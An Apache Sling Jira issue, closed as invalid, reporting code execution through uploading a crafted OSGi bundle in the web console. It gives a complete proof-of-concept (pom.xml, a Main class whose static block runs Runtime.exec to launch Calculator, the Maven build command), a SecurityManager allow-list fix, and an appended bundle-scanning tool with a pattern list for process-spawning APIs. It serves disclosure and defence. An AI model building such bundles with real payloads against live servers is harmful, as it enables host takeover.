[ https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Robert Munteanu resolved SLING-11658.
-------------------------------------
    Resolution: Invalid

Thank you for your report. In the future, please report security issues at secur...@sling.apache.org, following the process at https://sling.apache.org/project-information/security.html . We do not consider this to be a security issue, as accessing the web console already grants administrative privileges to all of Sling.

> sling remote code execute
> -------------------------
>
>                 Key: SLING-11658
>                 URL: https://issues.apache.org/jira/browse/SLING-11658
>             Project: Sling
>          Issue Type: Bug
>          Components: Console
>    Affects Versions: App CMS 1.1.2
>         Environment: OpenJDK Runtime Environment (Zulu 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
>            Reporter: QSec-Team
>            Priority: Major
>         Attachments: 1.png, 2.png
>
>
> h1. Utilization process
>
> After logging in to Sling, you can obtain control of the host through the OSGi management function by uploading a bundle package.
> !1.png!
>
> After uploading the malicious bundle package constructed by the attacker, first click the "Refresh Package Imports" button and then click the "Start" button. This triggers loading of the bundle, and the malicious code is executed.
> !2.png!
>
> h1. Jar package construction
>
> Create a new Maven project and add the following build configuration to pom.xml:
> {code:java}
> <build>
>     <plugins>
>         <plugin>
>             <groupId>org.apache.maven.plugins</groupId>
>             <artifactId>maven-assembly-plugin</artifactId>
>             <configuration>
>                 <descriptorRefs>
>                     <descriptorRef>jar-with-dependencies</descriptorRef>
>                 </descriptorRefs>
>                 <archive>
>                     <manifestEntries>
>                         <!-- OSGi headers the console needs to install and start the jar as a bundle -->
>                         <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
>                         <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
>                         <Bundle-Version>6.6.6</Bundle-Version>
>                     </manifestEntries>
>                 </archive>
>             </configuration>
>         </plugin>
>     </plugins>
> </build>
> {code}
> Create Main.java in the source folder. Note that the "package jsx.ink;" in the source code must correspond to the Bundle-Activator attribute in pom.xml.
> {code:java}
> package jsx.ink;
>
> public class Main {
>     // The static initializer runs when the framework initializes the
>     // activator class on bundle start, so the payload executes whether or
>     // not this class implements BundleActivator.
>     static {
>         try {
>             // macOS path from the reporter's environment; launching
>             // Calculator is the proof of code execution.
>             Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
>         } catch (Exception e) {
>             // ignored: failure to launch must not break class loading
>         }
>     }
>
>     public static void main(String[] args) {
>         System.out.println("Hello world!");
>     }
> }
> {code}
> After the code is written, enter the directory where pom.xml is located and package it with the Maven command:
> {code:java}
> mvn assembly:assembly -f pom.xml
> {code}
>
> h1. Repair
>
> You can use a SecurityManager to restrict some operations.
> {code:java}
> import java.util.Arrays;
> import java.util.List;
>
> // checkExec receives the program name (the first token of the command
> // line), so the allow-list is matched against that, not the full command.
> SecurityManager securityManager = new SecurityManager() {
>     @Override
>     public void checkExec(String cmd) {
>         // one entry per program; a single "whoami,netstat" string would match nothing
>         List<String> whiteList = Arrays.asList("whoami", "netstat");
>         if (!whiteList.contains(cmd)) {
>             throw new SecurityException("command execute denied!");
>         }
>         super.checkExec(cmd);
>     }
> };
> System.setSecurityManager(securityManager);
> {code}

-- This message was sent by Atlassian Jira (v8.20.10#820010)
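A check a deployer can run on a bundle jar before uploading it through the web console, added here as an example; it is not Sling or Felix project code and is not from the report. It reads the three manifest headers the report sets and does a byte-level scan of every class entry for constant-pool references to java/lang/Runtime and java/lang/ProcessBuilder, which is how a class calling Runtime.getRuntime().exec(...) shows up in its class file. The bundle it builds in buildSampleBundle() is constructed for the demo (the "class" entry is a stand-in blob carrying the constant-pool strings, not real bytecode); the class, method and field names are my own.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Enumeration;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.jar.Attributes;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.jar.JarOutputStream;
import java.util.jar.Manifest;
import java.util.zip.ZipEntry;

/** Pre-upload vetting of an OSGi bundle jar (example code, Java 8 compatible). */
public class BundleVetter {

    /** Constant-pool strings that show a class can spawn processes or load native code. */
    static final List<String> SUSPICIOUS = Arrays.asList(
            "java/lang/Runtime", "java/lang/ProcessBuilder", "loadLibrary");

    /** What to look at before clicking "Install" in the web console. */
    public static final class Report {
        public final String symbolicName, activator, version;
        /** class entry name -> suspicious strings found in it */
        public final Map<String, List<String>> hits = new TreeMap<>();

        Report(String symbolicName, String activator, String version) {
            this.symbolicName = symbolicName;
            this.activator = activator;
            this.version = version;
        }

        @Override public String toString() {
            StringBuilder sb = new StringBuilder()
                    .append("Bundle-SymbolicName: ").append(symbolicName).append('\n')
                    .append("Bundle-Version:      ").append(version).append('\n')
                    .append("Bundle-Activator:    ").append(activator)
                    .append(activator == null ? " (none)" : " (code runs on bundle start)").append('\n');
            if (hits.isEmpty()) sb.append("no process/native-code APIs referenced\n");
            for (Map.Entry<String, List<String>> e : hits.entrySet())
                sb.append("SUSPICIOUS ").append(e.getKey()).append(" -> ").append(e.getValue()).append('\n');
            return sb.toString();
        }
    }

    public static Report vet(Path jar) throws IOException {
        try (JarFile jf = new JarFile(jar.toFile())) {
            Manifest mf = jf.getManifest();
            Attributes a = mf == null ? new Attributes() : mf.getMainAttributes();
            Report r = new Report(a.getValue("Bundle-SymbolicName"),
                    a.getValue("Bundle-Activator"), a.getValue("Bundle-Version"));
            for (Enumeration<JarEntry> en = jf.entries(); en.hasMoreElements();) {
                JarEntry e = en.nextElement();
                if (!e.getName().endsWith(".class")) continue;
                // CONSTANT_Utf8 entries are stored as raw bytes, so a byte-level
                // search over the class file finds the referenced class names.
                String bytes = new String(readFully(jf.getInputStream(e)), StandardCharsets.ISO_8859_1);
                for (String s : SUSPICIOUS) {
                    if (bytes.contains(s)) {
                        r.hits.computeIfAbsent(e.getName(), k -> new ArrayList<>()).add(s);
                    }
                }
            }
            return r;
        }
    }

    private static byte[] readFully(InputStream in) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        for (int n; (n = in.read(buf)) > 0;) out.write(buf, 0, n);
        return out.toByteArray();
    }

    /** Constructed sample bundle: the report's headers plus a stand-in class blob (not real bytecode). */
    static Path buildSampleBundle() throws IOException {
        Manifest mf = new Manifest();
        Attributes a = mf.getMainAttributes();
        a.put(Attributes.Name.MANIFEST_VERSION, "1.0");
        a.putValue("Bundle-SymbolicName", "shxjia");
        a.putValue("Bundle-Activator", "jsx.ink.Main");
        a.putValue("Bundle-Version", "6.6.6");
        Path jar = Files.createTempFile("sample-bundle", ".jar");
        try (JarOutputStream jos = new JarOutputStream(Files.newOutputStream(jar), mf)) {
            jos.putNextEntry(new ZipEntry("jsx/ink/Main.class"));
            // magic number followed by the strings a Runtime.exec call leaves in the constant pool
            jos.write("\u00ca\u00fe\u00ba\u00be java/lang/Runtime getRuntime exec"
                    .getBytes(StandardCharsets.ISO_8859_1));
            jos.closeEntry();
        }
        return jar;
    }

    public static void main(String[] args) throws IOException {
        Path jar = args.length > 0 ? Paths.get(args[0]) : buildSampleBundle();
        Report r = vet(jar);
        System.out.print(r);
        // non-zero exit so a CI or release step can refuse the upload
        System.exit(r.hits.isEmpty() ? 0 : 1);
    }
}
```

Run it as `java BundleVetter path/to/bundle.jar` (or with no argument to vet the constructed sample). The scan is a heuristic: code that reaches Runtime through reflection or string assembly will not carry these names in its constant pool, so a clean report is not proof of a benign bundle, and a Bundle-Activator header alone means code runs on start. It does not change the point in the resolution: anyone who can install bundles through the web console is already an administrator of the whole instance, so the control that matters is who can reach the console at all.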